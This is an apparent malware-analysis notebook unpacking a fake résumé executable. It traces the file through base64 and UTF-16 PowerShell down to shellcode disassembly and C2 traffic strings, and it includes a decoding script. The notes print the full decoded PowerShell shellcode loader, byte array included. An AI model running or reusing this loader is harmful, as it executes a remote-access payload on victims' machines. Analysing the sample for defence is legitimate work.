Microsoft_Visual_Studio_NET ./resume1.doc.exe
Microsoft_Visual_C_v70_Basic_NET_additional ./resume1.doc.exe
Microsoft_Visual_C_Basic_NET ./resume1.doc.exe
Microsoft_Visual_Studio_NET_additional ./resume1.doc.exe
Microsoft_Visual_C_v70_Basic_NET ./resume1.doc.exe
NET_executable_ ./resume1.doc.exe
NET_executable ./resume1.doc.exe
domain ./resume1.doc.exe
without_attachments ./resume1.doc.exe
without_urls ./resume1.doc.exe
without_images ./resume1.doc.exe
_Microsoft_Visual_Cpp_v70_DLL_ ./resume1.doc.exe
without_images ./resume1.doc.exe
IP ./resume1.doc.exe
without_attachments ./resume1.doc.exe
contentis_base64 ./resume1.doc.exe

; strings
rabin2 -zz resume1.doc.exe
Metadata Signature: 0x268 0x10001424a5342 12
.NET Version: v4.0.30319
Number of Metadata Streams: 5
DirectoryAddress: 6c Size: f0
Stream name: #~ 4
DirectoryAddress: 15c Size: b8
Stream name: #Strings 12
DirectoryAddress: 214 Size: 3688
Stream name: #US 4
DirectoryAddress: 389c Size: 10
Stream name: #GUID 8
DirectoryAddress: 38ac Size: 38
Stream name: #Blob 8
vaddr=0x0000004d paddr=0x0000004d ordinal=000 sz=45 len=44 section=unknown type=ascii string=!This program cannot be run in DOS mode.\r\r\n$
vaddr=0x000000a9 paddr=0x000000a9 ordinal=001 sz=24 len=5 section=unknown type=utf32le string=Y `䀀  blocks=Basic Latin,CJK Unified Ideographs Extension A
vaddr=0x00000178 paddr=0x00000178 ordinal=002 sz=6 len=5 section=unknown type=ascii string=.text
vaddr=0x0000019f paddr=0x0000019f ordinal=003 sz=7 len=6 section=unknown type=ascii string=`.rsrc
vaddr=0x000001c7 paddr=0x000001c7 ordinal=004 sz=8 len=7 section=unknown type=ascii string=@.reloc
vaddr=0x00402056 paddr=0x00000256 ordinal=005 sz=5 len=4 section=.text type=ascii string=\n*2r
vaddr=0x00402068 paddr=0x00000268 ordinal=006 sz=5 len=4 section=.text type=ascii string=BSJB
vaddr=0x00402078 paddr=0x00000278 ordinal=007 sz=11 len=10 section=.text type=ascii string=v4.0.30319
vaddr=0x00402088 paddr=0x00000288 ordinal=008 sz=24 len=5 section=.text type=utf32le string=lð縣Ŝ¸ blocks=Basic Latin,Latin-1 Supplement,CJK Unified Ideographs,Latin Extended-A
vaddr=0x004020a0 paddr=0x000002a0 ordinal=009 sz=5 len=4 section=.text type=ascii string=ings
vaddr=0x004020bc paddr=0x000002bc ordinal=010 sz=6 len=5 section=.text type=ascii string=#GUID
vaddr=0x004020cc paddr=0x000002cc ordinal=011 sz=6 len=5 section=.text type=ascii string=#Blob
vaddr=0x004021c5 paddr=0x000003c5 ordinal=012 sz=9 len=8 section=.text type=ascii string=<Module>
vaddr=0x004021ce paddr=0x000003ce ordinal=013 sz=7 len=6 section=.text type=ascii string=pshcmd
vaddr=0x004021d9 paddr=0x000003d9 ordinal=014 sz=7 len=6 section=.text type=ascii string=system
vaddr=0x004021e0 paddr=0x000003e0 ordinal=015 sz=11 len=10 section=.text type=ascii string=msvcrt.dll
vaddr=0x004021ef paddr=0x000003ef ordinal=016 sz=7 len=6 section=.text type=ascii string=Object
vaddr=0x004021f6 paddr=0x000003f6 ordinal=017 sz=7 len=6 section=.text type=ascii string=System
vaddr=0x004021fd paddr=0x000003fd ordinal=018 sz=6 len=5 section=.text type=ascii string=.ctor
vaddr=0x00402203 paddr=0x00000403 ordinal=019 sz=5 len=4 section=.text type=ascii string=Main
vaddr=0x00402208 paddr=0x00000408 ordinal=020 sz=20 len=19 section=.text type=ascii string=csharpandpowershell
vaddr=0x0040221c paddr=0x0000041c ordinal=021 sz=30 len=29 section=.text type=ascii string=RuntimeCompatibilityAttribute
vaddr=0x0040223a paddr=0x0000043a ordinal=022 sz=32 len=31 section=.text type=ascii string=System.Runtime.CompilerServices
vaddr=0x0040225a paddr=0x0000045a ordinal=023 sz=9 len=8 section=.text type=ascii string=mscorlib
vaddr=0x00402263 paddr=0x00000463 ordinal=024 sz=24 len=23 section=.text type=ascii string=csharpandpowershell.exe
vaddr=0x0040227f paddr=0x0000047f ordinal=025 sz=4090 len=2045 section=.text type=utf16le string=powershell -window hidden -EncodedCommand JAB...AB
vaddr=0x00403279 paddr=0x00001479 ordinal=026 sz=4090 len=2045 section=.text type=utf16le string=4A...MA
vaddr=0x00404273 paddr=0x00002473 ordinal=027 sz=4090 len=2045 section=.text type=utf16le string=Yw...B9A
vaddr=0x0040526d paddr=0x0000346d ordinal=028 sz=1698 len=848 section=.text type=utf16le string=Ds...==였꽆쑜镨멁 blocks=Basic Latin,Hangul Syllables,CJK Unified Ideographs
vaddr=0x0040590f paddr=0x00003b0f ordinal=029 sz=6 len=5 section=.text type=ascii string=n'W]7
vaddr=0x0040592a paddr=0x00003b2a ordinal=030 sz=23 len=22 section=.text type=ascii string=WrapNonExceptionThrows
vaddr=0x00405982 paddr=0x00003b82 ordinal=031 sz=12 len=11 section=.text type=ascii string=_CorExeMain
vaddr=0x0040598e paddr=0x00003b8e ordinal=032 sz=12 len=11 section=.text type=ascii string=mscoree.dll
vaddr=0x00406062 paddr=0x00003c62 ordinal=033 sz=28 len=13 section=.rsrc type=utf16le string=_VERSION_INFO
vaddr=0x004060bc paddr=0x00003cbc ordinal=034 sz=22 len=10 section=.rsrc type=utf16le string=arFileInfo
vaddr=0x004060da paddr=0x00003cda ordinal=035 sz=24 len=11 section=.rsrc type=utf16le string=Translation
vaddr=0x004060fe paddr=0x00003cfe ordinal=036 sz=30 len=14 section=.rsrc type=utf16le string=StringFileInfo
vaddr=0x00406122 paddr=0x00003d22 ordinal=037 sz=18 len=8 section=.rsrc type=utf16le string=007f04b0
vaddr=0x0040613a paddr=0x00003d3a ordinal=038 sz=18 len=8 section=.rsrc type=utf16le string=Comments
vaddr=0x00406158 paddr=0x00003d58 ordinal=039 sz=22 len=10 section=.rsrc type=utf16le string=ompanyName
vaddr=0x0040617c paddr=0x00003d7c ordinal=040 sz=30 len=14 section=.rsrc type=utf16le string=ileDescription
vaddr=0x004061a6 paddr=0x00003da6 ordinal=041 sz=24 len=11 section=.rsrc type=utf16le string=FileVersion
vaddr=0x004061c0 paddr=0x00003dc0 ordinal=042 sz=16 len=7 section=.rsrc type=utf16le string=0.0.0.0
vaddr=0x004061d6 paddr=0x00003dd6 ordinal=043 sz=26 len=12 section=.rsrc type=utf16le string=InternalName
vaddr=0x004061f0 paddr=0x00003df0 ordinal=044 sz=40 len=19 section=.rsrc type=utf16le string=csharpandpowershell
vaddr=0x0040621e paddr=0x00003e1e ordinal=045 sz=30 len=14 section=.rsrc type=utf16le string=LegalCopyright
vaddr=0x00406248 paddr=0x00003e48 ordinal=046 sz=30 len=14 section=.rsrc type=utf16le string=egalTrademarks
vaddr=0x00406272 paddr=0x00003e72 ordinal=047 sz=34 len=16 section=.rsrc type=utf16le string=OriginalFilename
vaddr=0x00406294 paddr=0x00003e94 ordinal=048 sz=48 len=23 section=.rsrc type=utf16le string=csharpandpowershell.exe
vaddr=0x004062ca paddr=0x00003eca ordinal=049 sz=24 len=11 section=.rsrc type=utf16le string=ProductName
vaddr=0x004062f0 paddr=0x00003ef0 ordinal=050 sz=28 len=13 section=.rsrc type=utf16le string=roductVersion

; note
payload appears to be a PowerShell payload carried as base64

; not valid length by itself
JAB...AMAB

; collecting base64 strings together
JAB...==

; writing decoded base64 to file
import base64; open('resumebase64.decoded','wb').write(base64.b64decode("""JAB...=="""))  # Python 3; -EncodedCommand base64 decodes to UTF-16LE text

; strings from decoded base64
rabin2 -zz resumebase64.decoded
vaddr=0x00000000 paddr=0x00000000 ordinal=000 sz=4090 len=2045 section=unknown type=utf16le string=$E2yZ = '$BVJ = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $BVJ -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xe9,0xba,0x34,0x68,0x34,0x36,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x47,0x31,0x56,0x18,0x83,0xc6,0x04,0x03,0x56,0x20,0x8a,0xc1,0xca,0xa0,0xc8,0x2a,0x33,0x30,0xad,0xa3,0xd6,0x01,0xed,0xd0,0x93,0x31,0xdd,0x93,0xf6,0xbd,0x96,0xf6,0xe2,0x36,0xda,0xde,0x05,0xff,0x51,0x39,0x2b,0x00,0xc9,0x79,0x2a,0x82,0x10,0xae,0x8c,0xbb,0xda,0xa3,0xcd,0xfc,0x07,0x49,0x9f,0x55,0x43,0xfc,0x30,0xd2,0x19,0x3d,0xba,0xa8,0x8c,0x45,0x5f,0x78,0xae,0x64,0xce,0xf3,0xe9,0xa6,0xf0,0xd0,0x81,0xee,0xea,0x35,0xaf,0xb9,0x81,0x8d,0x5b,0x38,0x40,0xdc,0xa4,0x97,0xad,0xd1,0x56,0xe9,0xea,0xd5,0x88,0x9c,0x02,0x26,0x34,0xa7,0xd0,0x55,0xe2,0x22,0xc3,0xfd,0x61,0x94,0x2f,0xfc,0xa6,0x43,0xbb,0xf2,0x03,0x07,0xe3,0x16,0x95,0xc4,0x9f,0x22,0x1e,0xeb,0x4f,0xa3,0x64,0xc8,0x4b,0xe8,0x3f,0x71,0xcd,0x54,0x91,0x8e,0x0d,0x37,0x4e,0x2b,0x45,0xd5,0x9b,0x46,0x04,0xb1,0x68,0x6b,0xb7,0x41,0xe7,0xfc,0xc4,0x73,0xa8,0x56,0x43,0x3f,0x21,0x71,0x94,0x40,0x18,0xc5,0x0a,0xbf,0xa3,0x36,0x02,0x7b,0xf7,0x66,0x3c,0xaa,0x78,0xed,0xbc,0x53,0xad,0x98,0xb6,0xc3,0x96,0x6a,0x77,0x71,0x4f,0x97,0x77,0x56,0xbf,0x1e,0x91,0xc8,0xef,0x70,0x0e,0xa8,0x5f,0x31,0xfe,0x40,0x8a,0xbe,0x21,0x70,0xb5,0x14,0x4a,0x1a,0x5a,0xc1,0x22,0xb2,0xc3,0x48,0xb8,0x23,0x0b,0x47,0xc4,0x63,0x87,0x64,0x38,0x2d,0x60,0x00,0x2a,0xd9,0x80,0x5f,0x10,0x4f,0x9e,0x75,0x3f,0x6f,0x0a,0x72,0x96,0x38,0xa2,0x78,0xcf,0x0e,0x6d,0x82,0x3a,0
x05,0xa4,0x16,0x85,0x71,0xc9,0xf6,0x05,0x81,0x9f,0x9c,0x05,0xe9,0x47,0xc5,0x55,0x0c,0x88,0xd0,0xc9,0x9d,0x1d,0xdb,0xbb,0x72,0xb5,0xb3,0x41,0xad,
vaddr=0x00000ffa paddr=0x00000ffa ordinal=001 sz=1110 len=555 section=unknown type=utf16le string=0xf1,0x1b,0xb9,0x98,0x03,0x67,0x6c,0xe4,0x71,0x89,0xac;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$0dX3=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($0dX3.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$0dX3,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($E2yZ));$iS0 = "-enc ";if([IntPtr]::Size -eq 8){$BzQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $BzQ $iS0 $e"}else{;iex "& powershell $iS0 $e";}

; Investigating powershell
$E2yZ = '$BVJ = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $BVJ -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xe9,0xba,0x34,0x68,0x34,0x36,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x47,0x31,0x56,0x18,0x83,0xc6,0x04,0x03,0x56,0x20,0x8a,0xc1,0xca,0xa0,0xc8,0x2a,0x33,0x30,0xad,0xa3,0xd6,0x01,0xed,0xd0,0x93,0x31,0xdd,0x93,0xf6,0xbd,0x96,0xf6,0xe2,0x36,0xda,0xde,0x05,0xff,0x51,0x39,0x2b,0x00,0xc9,0x79,0x2a,0x82,0x10,0xae,0x8c,0xbb,0xda,0xa3,0xcd,0xfc,0x07,0x49,0x9f,0x55,0x43,0xfc,0x30,0xd2,0x19,0x3d,0xba,0xa8,0x8c,0x45,0x5f,0x78,0xae,0x64,0xce,0xf3,0xe9,0xa6,0xf0,0xd0,0x81,0xee,0xea,0x35,0xaf,0xb9,0x81,0x8d,0x5b,0x38,0x40,0xdc,0xa4,0x97,0xad,0xd1,0x56,0xe9,0xea,0xd5,0x88,0x9c,0x02,0x26,0x34,0xa7,0xd0,0x55,0xe2,0x22,0xc3,0xfd,0x61,0x94,0x2f,0xfc,0xa6,0x43,0xbb,0xf2,0x03,0x07,0xe3,0x16,0x95,0xc4,0x9f,0x22,0x1e,0xeb,0x4f,0xa3,0x64,0xc8,0x4b,0xe8,0x3f,0x71,0xcd,0x54,0x91,0x8e,0x0d,0x37,0x4e,0x2b,0x45,0xd5,0x9b,0x46,0x04,0xb1,0x68,0x6b,0xb7,0x41,0xe7,0xfc,0xc4,0x73,0xa8,0x56,0x43,0x3f,0x21,0x71,0x94,0x40,0x18,0xc5,0x0a,0xbf,0xa3,0x36,0x02,0x7b,0xf7,0x66,0x3c,0xaa,0x78,0xed,0xbc,0x53,0xad,0x98,0xb6,0xc3,0x96,0x6a,0x77,0x71,0x4f,0x97,0x77,0x56,0xbf,0x1e,0x91,0xc8,0xef,0x70,0x0e,0xa8,0x5f,0x31,0xfe,0x40,0x8a,0xbe,0x21,0x70,0xb5,0x14,0x4a,0x1a,0x5a,0xc1,0x22,0xb2,0xc3,0x48,0xb8,0x23,0x0b,0x47,0xc4,0x63,0x87,0x64,0x38,0x2d,0x60,0x00,0x2a,0xd9,0x80,0x5f,0x10,0x4f,0x9e,0x75,0x3f,0x6f,0x0a,0x72,0x96,0x38,0xa2,0x78,0xcf,0x0e,0x6d,0x82,0x3a,0x05,0xa4,0x16,0x85,0x71,0xc9,0xf6,0x05,0x81,0x9f,0x9c,0x05,0xe9,0x47,0xc5,0x55,0x0c,0x88,0xd0,0xc9,
0x9d,0x1d,0xdb,0xbb,0x72,0xb5,0xb3,0x41,0xad,0xf1,0x1b,0xb9,0x98,0x03,0x67,0x6c,0xe4,0x71,0x89,0xac;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$0dX3=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($0dX3.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$0dX3,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($E2yZ));$iS0 = "-enc ";if([IntPtr]::Size -eq 8){$BzQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $BzQ $iS0 $e"}else{;iex "& powershell $iS0 $e";}

; saving hex as binary file
open('resumehex.bin','wb').write(bytes.fromhex("0xd9,...0xac".replace(',','').replace('0x','').replace(' ','')))  # Python 3
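The chain the notes above walk through by hand (the .NET string carrying `powershell -EncodedCommand`, the base64 that rabin2 reported as consecutive 2045-character pieces, the UTF-16LE PowerShell inside it, and the `[Byte[]]` list of `0x..` values) as one added Python 3 script. This is example code, not from the post; the sample command line is constructed inside the block with a 4-byte stand-in for the payload, and the regexes are mine, shaped to the fragments shown above.

```python
"""Unpack the layers seen in the rabin2 output: .NET string ->
`powershell -window hidden -EncodedCommand <base64>` -> UTF-16LE
PowerShell -> `[Byte[]]$z = 0x..,0x..` shellcode list.
Added example; the sample input below is constructed, not the real payload."""
import base64
import re

# -EncodedCommand takes base64 of UTF-16LE text, which is why rabin2
# reported the decoded blob as type=utf16le.
ENCODED_COMMAND_RE = re.compile(r"-EncodedCommand\s+([A-Za-z0-9+/=]+)")
# PowerShell byte-array literal, e.g. [Byte[]]$z = 0xd9,0xe9,...
BYTE_LIST_RE = re.compile(
    r"\[Byte\[\]\]\$\w+\s*=\s*((?:0x[0-9a-fA-F]{2}\s*,?\s*)+)")


def join_string_chunks(chunks):
    """rabin2 -zz listed the long string as adjacent sz=4090/len=2045 pieces;
    the base64 must be rejoined before decoding, which is the post's
    'collecting base64 strings together' step."""
    return "".join(chunks)


def decode_encoded_command(cmdline: str) -> str:
    """Return the PowerShell text hidden in an -EncodedCommand argument."""
    m = ENCODED_COMMAND_RE.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def extract_byte_array(ps_text: str) -> bytes:
    """Pull the `0x..` list assigned to a [Byte[]] variable out as bytes."""
    m = BYTE_LIST_RE.search(ps_text)
    if not m:
        raise ValueError("no [Byte[]] literal found")
    tokens = re.findall(r"0x[0-9a-fA-F]{2}", m.group(1))
    return bytes(int(tok, 16) for tok in tokens)


# --- constructed sample (hypothetical, shaped like the page's payload) ---
INNER_PS = ("$BVJ = '...';[Byte[]];[Byte[]]$z = 0xd9,0xe9,0xba,0x34;"
            "$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length}")
SAMPLE_B64 = base64.b64encode(INNER_PS.encode("utf-16-le")).decode("ascii")
# Pretend the strings tool split the base64 into 40-char pieces, the way
# rabin2 split the real one at 2045 characters.
SAMPLE_CHUNKS = [SAMPLE_B64[i:i + 40] for i in range(0, len(SAMPLE_B64), 40)]
SAMPLE_CMDLINE = ("powershell -window hidden -EncodedCommand "
                  + join_string_chunks(SAMPLE_CHUNKS))


def unpack(cmdline: str = SAMPLE_CMDLINE) -> bytes:
    """Full chain: command line -> inner PowerShell -> raw shellcode bytes."""
    return extract_byte_array(decode_encoded_command(cmdline))


if __name__ == "__main__":
    print(unpack().hex())  # d9e9ba34 for the constructed sample
```

With the real sample, `cmdline` is the `powershell -window hidden -EncodedCommand JAB...` string after the three rabin2 pieces are rejoined.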

; radare from bin 
[0x00000000]> pD
            0x00000000      d9e9           fldl2t
            0x00000002      ba34683436     mov edx, 0x36346834
       :    0x00000007      d97424f4       fnstenv dword [rsp - 0xc]
       :    0x0000000b      5e             pop rsi
       :    0x0000000c      33c9           xor ecx, ecx
       :    0x0000000e      b147           mov cl, 0x47                ; 'G'
       :    0x00000010      315618         xor dword [rsi + 0x18], edx
       :    0x00000013      83c604         add esi, 4
       :    0x00000016      035620         add edx, dword [rsi + 0x20]
       :    0x00000019      8ac1           mov al, cl
       :    0x0000001b      caa0c8         retf -0x3760
       :    0x0000001e      2a33           sub dh, byte [rbx]
       :    0x00000020      30ada3d601ed   xor byte [rbp - 0x12fe295d], ch
       :    0x00000026      d09331dd93f6   rcl byte [rbx - 0x96c22cf], 1
       :    0x0000002c      bd96f6e236     mov ebp, 0x36e2f696
       :    0x00000031      dade           fcmovu st(0), st(6)
       :    0x00000033      05ff51392b     add eax, 0x2b3951ff
       :    0x00000038      00c9           add cl, cl
      ,===< 0x0000003a      792a           jns 0x66
      |:    0x0000003c      82             invalid
      |:    0x0000003d      10ae8cbbdaa3   adc byte [rsi - 0x5c254474], ch
      |:    0x00000043      cdfc           int 0xfc
      |:    0x00000045      07             invalid
      |:    0x00000046      499f           lahf
      |:    0x00000048      55             push rbp
      |:    0x00000049      43fc           cld
      |:    0x0000004b      30d2           xor dl, dl
      |:    0x0000004d      193dbaa88c45   sbb dword [0x458ca90d], edi
      |:    0x00000053      5f             pop rdi
      |`==< 0x00000054      78ae           js 4
      |.--> 0x00000056      64             invalid
      |:    0x00000057      ce             invalid
      |:,=< 0x00000058      f3e9a6f0d081   jmp 0xffffffff81d0f104
      |:|   0x0000005e      ee             out dx, al
      |:|   0x0000005f      ea             invalid
      |:|   0x00000060      35afb9818d     xor eax, 0x8d81b9af
      |:|   0x00000065      5b             pop rbx
      `---> 0x00000066      3840dc         cmp byte [rax - 0x24], al   ; [0x2:1]=186
       :|   0x00000069      a4             movsb byte [rdi], byte ptr [rsi]
       :|   0x0000006a      97             xchg eax, edi
       :|   0x0000006b      ad             lodsd eax, dword [rsi]
       :|   0x0000006c      d156e9         rcl dword [rsi - 0x17], 1
       :|   0x0000006f      ea             invalid
       :|   0x00000070      d5             invalid
       :|   0x00000071      889c022634a7.  mov byte [rdx + rax - 0x2f58cbda], bl
       :|   0x00000078      55             push rbp
       :,=< 0x00000079      e222           loop 0x9d
      :||   0x0000007b      c3             ret
      :||   0x0000007c      fd             std
      :||   0x0000007d      61             invalid
      :||   0x0000007e      94             xchg eax, esp
      :||   0x0000007f      2f             invalid
      :||   0x00000080      fc             cld
      :||   0x00000081      a6             cmpsb byte [rsi], byte ptr [rdi] ; [0x2700000000:1]=255 ; 167503724544
      :||   0x00000082      43bbf20307e3   mov r11d, 0xe30703f2
      :||   0x00000088      16             invalid                     ; 0xe30703f2
      :||   0x00000089      95             xchg eax, ebp
      :||   0x0000008a      c4             invalid
      :||   0x0000008b      9f             lahf
      :||   0x0000008c      221e           and bl, byte [rsi]
      ,===< 0x0000008e      eb4f           jmp 0xdf
     |:||   0x00000090      a364c84be83f.  movabs dword [0x54cd713fe84bc864], eax ; [0x54cd713fe84bc864:4]=-1
     |:||   0x00000099      91             xchg eax, ecx
     |:||   0x0000009a      8e0d374e2b45   mov cs, word [0x452b4ed7]   ; [0x452b4ed7:2]=0xffff
      |:|   0x000000a0      d5             invalid                     ; [0x452b4ed7:2]=0xffff
      |:|   0x000000a1      9b             wait
      |:|   0x000000a2      4604b1         add al, 0xb1
      |:|   0x000000a5      686bb741e7     push -0x18be4895
      |:|   0x000000aa      fc             cld
      |:|   0x000000ab      c4             invalid
      |`==< 0x000000ac      73a8           jae 0x56
      | |   0x000000ae      56             push rsi
      | |   0x000000af      43             invalid
      | .-> 0x000000b0      3f             invalid
     | :|   0x000000b1      217194         and dword [rcx - 0x6c], esi
     | :|   0x000000b4      4018c5         sbb bpl, al
     | :|   0x000000b7      0abfa336027b   or bh, byte [rdi + 0x7b0236a3]
     | :|   0x000000bd      f7663c         mul dword [rsi + 0x3c]
     | :|   0x000000c0      aa             stosb byte [rdi], al
      | `=< 0x000000c1      78ed           js 0xb0
      | |   0x000000c3      bc53ad98b6     mov esp, 0xb698ad53
      | |   0x000000c8      c3             ret
      | |   0x000000c9      96             xchg eax, esi
      | |   0x000000ca      6a77           push 0x77                   ; 'w'
      | ,=< 0x000000cc      714f           jno 0x11d
     | ||   0x000000ce      97             xchg eax, edi
      |,==< 0x000000cf      7756           ja 0x127
     ||||   0x000000d1      bf1e91c8ef     mov edi, 0xefc8911e
     ,====< 0x000000d6      700e           jo 0xe6
    |||||   0x000000d8      a85f           test al, 0x5f               ; '_'
    |||||   0x000000da      31fe           xor esi, edi
    |||||   0x000000dc      408abe2170b5.  mov dil, byte [rsi + 0x14b57021] ; [0x14b57021:1]=255
    | |||   0x000000e3      4a1a5ac1       sbb bl, byte [rdx - 0x3f]
      |||   0x000000e7      22b2c348b823   and dh, byte [rdx + 0x23b848c3]
      |||   0x000000ed      0b47c4         or eax, dword [rdi - 0x3c]
      |||   0x000000f0      63             invalid
      |||   0x000000f1      8764382d       xchg dword [rax + rdi + 0x2d], esp
      |||   0x000000f5      60             invalid
      |||   0x000000f6      002a           add byte [rdx], ch
      |||   0x000000f8      d9805f104f9e   fld dword [rax - 0x61b0efa1]
      ,===< 0x000000fe      753f           jne 0x13f

; changed to 32 bit
radare2 -b 32 resumehex.bin
[0x00000000]> pD
            0x00000000      d9e9           fldl2t
            0x00000002      ba34683436     mov edx, 0x36346834
      :     0x00000007      d97424f4       fnstenv dword [esp - 0xc]
      :     0x0000000b      5e             pop esi
      :     0x0000000c      33c9           xor ecx, ecx
      :     0x0000000e      b147           mov cl, 0x47                ; 'G'
      :     0x00000010      315618         xor dword [esi + 0x18], edx
      :     0x00000013      83c604         add esi, 4
      :     0x00000016      035620         add edx, dword [esi + 0x20]
      :     0x00000019      8ac1           mov al, cl
      :     0x0000001b      caa0c8         retf -0x3760
      :     0x0000001e      2a33           sub dh, byte [ebx]
      :     0x00000020      30ada3d601ed   xor byte [ebp - 0x12fe295d], ch
      :     0x00000026      d09331dd93f6   rcl byte [ebx - 0x96c22cf], 1
      :     0x0000002c      bd96f6e236     mov ebp, 0x36e2f696
      :     0x00000031      dade           fcmovu st(0), st(6)
      :     0x00000033      05ff51392b     add eax, 0x2b3951ff
      :     0x00000038      00c9           add cl, cl
     ,====< 0x0000003a      792a           jns 0x66
     |:     0x0000003c      82             invalid
     |:     0x0000003d      10ae8cbbdaa3   adc byte [esi - 0x5c254474], ch
     |:     0x00000043      cdfc           int 0xfc
     |:     0x00000045      07             pop es
     |:     0x00000046      49             dec ecx
     |:     0x00000047      9f             lahf
     |:     0x00000048      55             push ebp
     |:     0x00000049      43             inc ebx
     |:     0x0000004a      fc             cld
     |:     0x0000004b      30d2           xor dl, dl
     |:     0x0000004d      193dbaa88c45   sbb dword [0x458ca8ba], edi
     |:     0x00000053      5f             pop edi
     |`===< 0x00000054      78ae           js 4
     |      0x00000056      64ce           into
     | ,==< 0x00000058      f3e9a6f0d081   jmp 0x81d0f104
     | |    0x0000005e      ee             out dx, al
     | |,=< 0x0000005f      ea35afb9818d.  ljmp 0x5b8d:0x81b9af35
     `----> 0x00000066      3840dc         cmp byte [eax - 0x24], al   ; [0x2:1]=186
      |:|   0x00000069      a4             movsb byte es:[edi], byte ptr [esi]
      |:|   0x0000006a      97             xchg eax, edi
      |:|   0x0000006b      ad             lodsd eax, dword [esi]
      |:|   0x0000006c      d156e9         rcl dword [esi - 0x17], 1
       ,==< 0x0000006f      ead5889c0226.  ljmp 0x3426:0x29c88d5
     ||:|   0x00000076      a7             cmpsd dword [esi], dword ptr es:[edi] ; [0x170000001c:4]=-1 ; 98784247836
     ||:|   0x00000077      d055e2         rcl byte [ebp - 0x1e], 1
     ||:|   0x0000007a      22c3           and al, bl
     ||:|   0x0000007c      fd             std
     ||:|   0x0000007d      61             popal
     ||:|   0x0000007e      94             xchg eax, esp
     ||:|   0x0000007f      2f             das
     ||:|   0x00000080      fc             cld
     ||:|   0x00000081      a6             cmpsb byte [esi], byte ptr es:[edi] ; [0x170000001c:1]=255 ; 98784247836
     ||:|   0x00000082      43             inc ebx
     ||:|   0x00000083      bbf20307e3     mov ebx, 0xe30703f2
     ||:|   0x00000088      16             push ss
     ||:|   0x00000089      95             xchg eax, ebp
     ||:|   0x0000008a      c49f221eeb4f   les ebx, [edi + 0x4feb1e22]
     ||:|   0x00000090      a364c84be8     mov dword [0xe84bc864], eax ; [0xe84bc864:4]=-1

; because lazy and time
https://app.any.run/tasks/995eb5e3-4c5f-4c47-b849-67ff647c6387

; Connection data
(myserver):9008 -> exe came across
dumped entire pcap from c2 into file:
- file resumepcap.hexdump
--  resumepcap.hexdump: data
egrep -nor '[^ ]{30,}' resumepcap.stringsdump |grep string
1237:string=core_negotiate_tlv_encryption
1238:string=core_transport_set_timeouts
1239:string=core_transport_getcerthash
1240:string=core_transport_setcerthash
1261:string=\a\a\b\b\t\t\n\n\v\v\f\f\r\r
1382:string=InitializeCriticalSectionEx
1385:string=SetThreadStackGuarantee
1388:string=WaitForThreadpoolTimerCallbacks
1393:string=FlushProcessWriteBuffers
1394:string=FreeLibraryWhenCallbackReturns
1395:string=GetCurrentProcessorNumber
1396:string=GetLogicalProcessorInformation
1398:string=SetDefaultDllDirectories
1404:string=GetUserDefaultLocaleName
1409:string=GetFileInformationByHandleExW
1410:string=SetFileInformationByHandleW
1436:string=GetUserObjectInformationW
1437:string=GetProcessWindowStation
1773:string=packet_get_tlv_value_string
1774:string=packet_get_tlv_value_uint
1775:string=packet_get_tlv_value_wstring
1777:string=packet_is_tlv_null_terminated
1778:string=packet_remove_completion_handler
1780:string=packet_transmit_empty_response
1781:string=packet_transmit_response
1784:string=scheduler_insert_waitable
1785:string=scheduler_signal_waitable
1786:string=_scheduler_waitable_thread@4
1789:string=CertGetCertificateContextProperty
1813:string=WinHttpGetIEProxyConfigForCurrentUser
1826:string=SetUnhandledExceptionFilter
1856:string=GetProcessWindowStation
1857:string=GetUserObjectInformationW
1862:string=AllocateAndInitializeSid
1864:string=InitializeSecurityDescriptor
1865:string=SetSecurityDescriptorDacl
1866:string=SetSecurityDescriptorSacl
1873:string=CryptImportPublicKeyInfo
1895:string=CreateToolhelp32Snapshot
1903:string=GetSystemTimeAsFileTime
1908:string=IsProcessorFeaturePresent
1922:string=QueryPerformanceCounter
1924:string=FreeEnvironmentStringsW
1925:string=UnhandledExceptionFilter
1926:string=InitializeCriticalSectionAndSpinCount
1946:string=ImpersonateLoggedOnUser
2008:string=core_pivot_session_died
2028:string=\a\a\b\b\t\t\n\n\v\v\f\f\r\r
2056:string=\t\a\f\b\f\t\f\n\a\v\b\f
2061:string=abcdefghijklmnopqrstuvwxyz
2062:string=ABCDEFGHIJKLMNOPQRSTUVWXYZ
2064:string=abcdefghijklmnopqrstuvwxyz
